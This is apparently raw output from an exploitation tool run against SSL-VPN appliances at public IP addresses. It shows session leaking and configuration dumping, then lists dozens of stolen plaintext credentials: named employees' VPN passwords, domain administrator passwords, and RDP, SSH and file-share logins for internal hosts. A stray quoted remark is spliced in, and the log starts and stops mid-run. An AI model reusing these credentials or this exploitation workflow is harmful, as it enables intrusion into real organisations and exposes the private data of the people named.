[+] Saving config to ./Dumps/172.81.67.174/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 78 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds Administrator:Manresa02#@10.1.10.210

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 4, 'name': 'Retif Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfterm.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 4, 'name': 'PDI Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfpditermprd.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 6, 'name': 'MAS90 Terminal for ehicks', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jut-ehmaas.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 41, 'name': 'Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'JUT-JHARTLEY2.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 39, 'name': 'L Fisher Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'JUT-LFISHER.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 67, 'name': 'Office Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.1.10.72'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 71, 'name': 'PDI Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfpditermprd.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 71, 'name': 'Retif Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfterm.retifnet.retif.com'}
``and there's also one more crack in the works right now''.
[+] Checking URL https://173.247.171.106
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.1-18sv

[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 08wKU0nD0NHM018GdPixkSp0veaEEfUNs1sfY3emGN8= userType: 1 userName: connie.arteaga Password: Clevs8787 Domain: Beyond
      [+] Found: SessionID: 1EYTlhUHb3WlJkyj6scGx0d1E45q4HdXA1KqyU8IXYs= userType: 1 userName: jim.movius Password: Grant3333 Domain: Beyond
      [+] Found: SessionID: 1Yw1sPSEQbDO1nbNbjTBcBcHdiJImQaNz1I1lwAmnxOSSE= userType: 1 userName: Steven.Craig Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: 1nOvfdxEtWVea0UkJvtNyIwBLP0O79CE8E1GZZdONc= userType: 1 userName: steve.price Password: Incorrect100 Domain: Beyond
      [+] Found: SessionID: 3HZDekmljv4atHltwUxKNQY1S0v1jlgw1TtNSAZG7pw= userType: 1 userName: Leslie.Avalos Password: Grantweber2018 Domain: Beyond
      [+] Found: SessionID: 98xPB0MpOWeItn9GWgS93plCOLbFch0X9xFcN8shiag= userType: 1 userName: kailani.gaspar Password: v1nce2307 Domain: Beyond
      [+] Found: SessionID: Cf3UjAwYoQgvqTHWxkBX3gdrOM6syrTuecLKh05qUoc= userType: 1 userName: robert.nye Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: EYZKipX33P9zsCZ6se1WIx01zUkyMFdBRQcmLlADkhw= userType: 1 userName: pilar.zuniga Password: basiaZ1929 Domain: Beyond
      [+] Found: SessionID: HDREC6P5KFHGoW1vGbZLyTQxGc5aUNHzuaMgVHE2KOk= userType: 1 userName: Rodolfo.Maldonado Password: Grant2021* Domain: Beyond
      [+] Found: SessionID: Ikd51149NxTHZFsSlmFzmcgqGvEAR4jfGWqL9nEJQhg= userType: 1 userName: joanna.gallegos Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: J1cTnjaQPil0T86G0S6JkLE0a3AA41xSB3oJ2C1nDPg= userType: 1 userName: tony.aguayo Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: KMDs2M9R8fDa79OTo8S348NFJvJvBp0QiRPbTsMK14Gmc= userType: 1 userName: Denise.Williams Password: Grant2016 Domain: Impact
      [+] Found: SessionID: LdFQ9ghPD0O5mIJt7WkT7v2K1SJwhcf2GhiALf7WUxI= userType: 1 userName: Luis.Fernandez Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: MB61rZaVHu4Fd01rTiNb4ebPSv37ciFbWGyjHPojus= userType: 1 userName: Jung.Lee Password: Lebron2021 Domain: Beyond
      [+] Found: SessionID: PGMscMXIm0PGyWz1SLfpcZFFViP2Qhkh9oLDjmYbGANM= userType: 1 userName: Jeff.Moeller Password: Bruce1967 Domain: Beyond
      [+] Found: SessionID: THdBDUwEn4S79iRjybPvDFo6t2YsFJ0sSrba7PoKa8= userType: 1 userName: bereniz.boss Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: VINYGOn933HMn1EVeh3Hqfo7DkyEswr3DZuEPnR2vr4= userType: 1 userName: joseph.monette Password: Vegas2020 Domain: Beyond
      [+] Found: SessionID: WUolvIMVxr5vU0R8400eH1nofJp4Eo5ztra4eil2pJ4= userType: 1 userName: josey.barrera Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: WZh28egsBep41ACBjFqqF1eRbVpPENVxx5LFZMfuoxs= userType: 1 userName: Steven.Mehr Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: XLg1SWXPoCO0tiowUdnblgUrdLUlco2PDzbbx81R8wg= userType: 1 userName: Sandra.Silva Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: XvG4d2mFJOWr11oUfdwZAS3TvjEilgl8kcHuAxbIRH8= userType: 1 userName: jason.allison Password: Grant2024 Domain: Beyond
      [+] Found: SessionID: ZNhJROmzHsCRwB81lAKDIyqcc97GM9nJVabiOVCadyM= userType: 1 userName: oscar.soto Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: a3ltPWpiKONzJ27EASYq5PpDjOPWB06ckP24q1oactM= userType: 1 userName: Eric.Mcinnis Password: Lolo702277 Domain: Beyond
      [+] Found: SessionID: d1CmeOs8Fg603rog8E8DDDEAgvd5dBnPhXDnsovWEbx8= userType: 1 userName: Nellie.Rosales Password: Nini2018# Domain: Beyond
      [+] Found: SessionID: dVTFvujUeSSwuweBIhzU2okUgnwcmrH51uoHojrkdbM= userType: 1 userName: jamie.ferreira Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: gCHZ4UatX97lMcsjhlYV6VcezzodohrVjB1HC7yQjKHo= userType: 1 userName: Sharon.Poole Password: Sharonp20201 Domain: Beyond
      [+] Found: SessionID: gGzMmC1Ze9b9RPZeA9itq4Mlf5BV6KfSmiRqdYa1g7A= userType: 1 userName: loraine.molina Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: gYy6AOPIOh0fSSbUXFDPcUuGqH95c00BNHn7WbRetSw= userType: 1 userName: melik.poghosyan Password: Grant1111 Domain: Beyond
      [+] Found: SessionID: jFgGjaqh1FvP0yy8iBKQiHiKLFPGCiEstDEN1pmoXY= userType: 1 userName: Janiece.Knott Password: Janiece1 Domain: Beyond
      [+] Found: SessionID: keWbTufTW0TAXNHwik99d1u9FbztTnyifCg1H5Zad34= userType: 1 userName: kyle.shorten Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: lEDnuPFpU0MJOE4kwqAfHuDWgKjGzSxCfikysyh1XM= userType: 1 userName: Frances.Guerrero Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: n1Ryw5Npa34yil3ClDr4rxwVVVE23YAIfnMq0ieYqLCIM= userType: 1 userName: jake.ortiz Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: nSSw2myFOc4UOOsB4ethYNEuQszC277jky8qdwbKOi0= userType: 1 userName: april.vance Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: nn9KyDegeC6Vso1CzrXrJVKESDgFERzGr1HUuhmiVNdY= userType: 1 userName: lluvia.aguayo Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: rhyybLubLCmo3rYUE319r5Hcx91oUzmDYSYhFMi9VU= userType: 1 userName: Zaineb.Hasan Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: rjtrDOMZRkaVU81LkI1SSYaQNzoop1ChrSfSvCe2Gg= userType: 1 userName: eric.holmes Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: sxM0QSrebzOJBsFq0m21ayCFmTE2oCSQ3rYFfGAghTE= userType: 1 userName: Chris.Brown Password: Grant2020 Domain: Sales
      [+] Found: SessionID: v19KVv1mCxhZFhq3eWrMMITArOMs2nrr34qYoWTYujU= userType: 1 userName: sabrina.buksh Password: 10066Buksh Domain: Beyond
      [+] Found: SessionID: verRB4sw28XB4A0eEI0ewLablalELYO83gfIDY96zyI= userType: 1 userName: dorothy.roscher Password: Dorothy1966$ Domain: Sales
      [+] Found: SessionID: wBlAIohH03mCi8XxyQLDs1YYa1BsTXm1k9FsrohXmaU= userType: 1 userName: luis.garcia Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: wU9MQsVIHBXhkNUHgYbVJUHiqmCrnsAsuihXW6LIUT8= userType: 1 userName: vincent.velardi Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: xR18vaBQUR6z2q4kOLGWehrPFbV3I5b1dVFsbAJwCDE= userType: 1 userName: Pedro.Campos Password: Grant1980! Domain: Beyond
[+] Done with https://173.247.171.106, found 42 sessions
42
[+] Saving session data
[+] Trying session 08wKU0nD0NHM018GdPixkSp0veaEEfUNs1sfY3emGN8=
[+] Saving config to ./Dumps/173.247.171.106/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 88 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds :@10.10.10.5
[+] AD creds :@10.10.10.5
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds :@10.10.10.7
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 19, 'name': 'Transfer Files', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\gwcafile1\\transfer\\%USERNAME%\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 17, 'name': 'Launch Impact !!!', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Contracts Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\\contracts\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 28, 'name': 'Click to Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Managers Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\managers\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': ''T' Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\\FD3\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 26, 'name': 'Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 26, 'name': 'Trust Share "Q" Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.3\Trust\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 26, 'name': 'QuickBooks Share "X Drive"', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.3\\QuickBooks\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': '"W" Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\\WorkCompShareData\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 38, 'name': 'Secure File Transfer', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.3\\SecureShare\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 42, 'name': 'Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 42, 'name': 'File Transfer', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.12\transfer\\Tehachapi\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 52, 'name': 'Secure File transfer', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.5'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'SFTP Share', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.12\transfer\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Akcelerant', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'akcel-web/Akcelerant/Core/Desktop/Desktop.mvc/Index'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 63, 'name': 'FIle Transfer Link', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.12\transfer\\Olympia\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 63, 'name': 'Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 64, 'name': 'Launch Akcelerant', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'akcel-web/akcelerant'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 77, 'name': 'Impact Remote Access', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.153'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Akcelerant Web Server', 'username': 'sqladmin', 'password': 'Gr@nt2011it01', 'service': 'RDP', 'host': '10.10.20.20'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Akcelerant Database Server', 'username': 'sqladmin', 'password': 'Gr@nt2011it01', 'service': 'RDP', 'host': '10.10.20.21'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Akcelerant Test Server', 'username': 'administrator', 'password': 'Gr@nt2011it01', 'service': 'RDP', 'host': '10.10.10.23'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'File Share on Akcel-Web', 'username': 'sqladmin', 'password': 'Gr@nt2011it01', 'service': 'CIFS_SMB', 'host': '\\\\10.10.20.20\\Files\\\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'File Share on Akcelerant Test Server', 'username': 'administrator', 'password': 'Gr@nt2011it01', 'service': 'CIFS_SMB', 'host': '\\\\10.20.0.95\\New\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Sales Department Share', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\Groups\\\\\Sales\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 43, 'name': 'Denise'PC', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.184'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Download and Install DAKCS Beyond', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.30:10080/BeyondSetup.zip'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Download and Install Artiva', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.30:10080/Artiva.zip'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 241, 'name': 'Connect to Office PC', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.56'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Dakcs Beyond', 'username': 'root', 'password': 'D@kc$1', 'service': 'SSH', 'host': '10.10.10.220'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Dakcs Backups', 'username': 'administrator', 'password': '2016GW@Calabasas', 'service': 'CIFS_SMB', 'host': '\\\\10.10.10.2\e$\\DAKCSBK\dakcs\\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Dakcs Install Files', 'username': 'administrator', 'password': '2016GW@Calabasas', 'service': 'CIFS_SMB', 'host': '\\\\10.10.10.2\App Shares\\\DAKCS\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'GW File Share', 'username': 'stanleyford', 'password': '8826040aA!', 'service': 'CIFS_SMB', 'host': '\\\\10.10.10.12\transfer\\\MalibuGroup\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'RDP to Local PC', 'username': 'jilagan', 'password': 'Gr@nt2019', 'service': 'RDP', 'host': '10.10.11.34'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 267, 'name': 'Connect to PC', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.6'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc...', 'username': 'vincent.velardi', 'password': 'Grant1993**', 'service': 'RDP', 'host': '10.10.10.237'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'loraine.molina', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.226'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 271, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.228'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 273, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.146'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'pedro.campos', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.104'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 280, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.10'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 275, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.16'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 276, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.33'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 281, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.100'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 277, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.67'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 279, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.116'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 278, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.139'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 194, 'name': 'Download Streams Phone App', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'www.dropbox.com/s/bh40vtpu0w14zr9/Streams_Setup.exe?dl=0'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 282, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.119'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'octavia.mcclendon', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.40.10.41'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Sharon.Poole', 'password': 'Sharon2020@', 'service': 'RDP', 'host': '10.10.11.210'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Oscar.Aguilar', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.65'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'oasey.covello', 'password': 'Grant2021', 'service': 'RDP', 'host': '10.10.10.74'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Oscar.Soto', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.40.10.22'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'arielle.leigh', 'password': 'leseid0818', 'service': 'RDP', 'host': '10.40.10.29'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 290, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.41'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'kyle.shorten', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.80'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'tony.aguayo', 'password': 'Covid2020', 'service': 'RDP', 'host': '10.10.11.107'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Daniel.Cha', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.145'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 297, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.40.10.27'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'josey.barrera', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.189'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'pilar.zuniga', 'password': 'basiaZ1929', 'service': 'RDP', 'host': '10.10.10.147'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 299, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.71'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Olivia.Sands', 'password': 'Love1978

, 'service': 'RDP', 'host': '10.40.10.23'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to Remote Access pc', 'username': 'Olivia.Sands', 'password': 'Love1978

 , 'service': 'RDP', 'host': '10.10.10.153'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Jeff.Moeller', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.105'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 303, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.123'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'luis.garcia', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.209'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Frances.Guerrero', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.208'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'luis.vasquez', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.207'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'joseph.monette', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.106'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'belen.castillo', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.19'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'steve.price', 'password': 'Grantweber2020', 'service': 'RDP', 'host': '10.10.11.222'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 310, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.99'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 311, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.40.10.20'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'michael.longres', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.18'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'joshua.widawski', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.39'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'eric.holmes', 'password': 'Grant2019', 'service': 'RDP', 'host': '10.10.10.112'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'joanna.gallegos', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.82'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc...', 'username': 'april.vance', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.63'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Melik.Poghosyan', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.250'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Janiece.Knott', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.40.10.32'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 319, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.143'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'kim.mehr', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.200'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'kim.mehr', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.200'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'lionel.garcia', 'password': 'GrantWeber2020', 'service': 'RDP', 'host': '10.10.11.143'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'Bernardo.soto', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.100'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to your pc', 'username': 'jake.ortiz', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.11.84'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 233, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.11.35'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 324, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.110'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 322, 'name': 'Connect to your pc', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.165'}
[**] Found bookmark with creds
